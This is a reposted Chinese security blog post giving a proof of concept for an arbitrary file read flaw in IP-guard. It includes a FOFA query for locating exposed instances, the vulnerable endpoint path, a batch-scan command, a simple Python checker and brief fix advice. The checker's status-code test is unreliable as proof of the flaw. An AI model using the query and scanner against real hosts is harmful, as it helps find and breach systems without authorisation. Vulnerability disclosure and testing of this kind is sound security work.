【POC】ip-guard-getdatarecord-任意文件读取漏洞复现

admin
admin
admin
102859
文章
87
评论
2024年4月22日19:30:27评论18 views字数 1044阅读3分28秒阅读模式
 

01 产品描述
【POC】ip-guard-getdatarecord-任意文件读取漏洞复现

IP-guard是一款功能强大的内网安全软件,致力于全面解决信息安全、应用效率、系统管理三大难题。它采用系统管理思想,集成了操作审计、权限管控、文档加密等多种技术手段,为企业提供全方位的内网安全保障。借助IP-guard,企业可以有效地防范信息外泄,保护核心数据资产的安全。同时,它还能营造健康安全的网络环境,提升工作效率,并合理分配网络资源。对于IT人员来说,IP-guard提供了便捷的系统维护工具,确保系统始终处于最佳运行状态,从而推动业务的快速发展。

02 FOFA语法
app="IP-guard"
03 漏洞复现
python3 main.py -f url.txt -p ip-guard-getdatarecord-readfile

【POC】ip-guard-getdatarecord-任意文件读取漏洞复现

【POC】ip-guard-getdatarecord-任意文件读取漏洞复现

import requests
import argparse

def check(url) -> bool:
    try:
        result = False
        if url:
            response = requests.get(f"{url}/ipg/appr/MApplyList/downloadFile_client/getdatarecord")
            if response.status_code == 200: 
                result = True
    except Exception as e:
        print(f"Error: {e}")
    return result

def main():
    parser = argparse.ArgumentParser(description='Check if a URL is vulnerabled.')
    parser.add_argument('-u', '--url', type=str, help='URL to check', default=None)
    args = parser.parse_args()
    url = args.url
    if url:
        if check(url):
            print("URL is vulnerabled.")
        else:
            print("URL is not vulnerabled.")
    else:
        print("-u target No URL provided.")

if __name__ == "__main__":
    main()

 

04 修复建议

1、限制getdatarecord接口的访问

2、升级ip-guard至最新版本

3、官网下载最新补丁版本:http://www.ip-guard.net

 

原文始发于微信公众号(SCA御盾):【漏洞复现】ip-guard-getdatarecord-任意文件读取漏洞复现

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月22日19:30:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【POC】ip-guard-getdatarecord-任意文件读取漏洞复现https://cn-sec.com/archives/2679887.html

发表评论

匿名网友 填写信息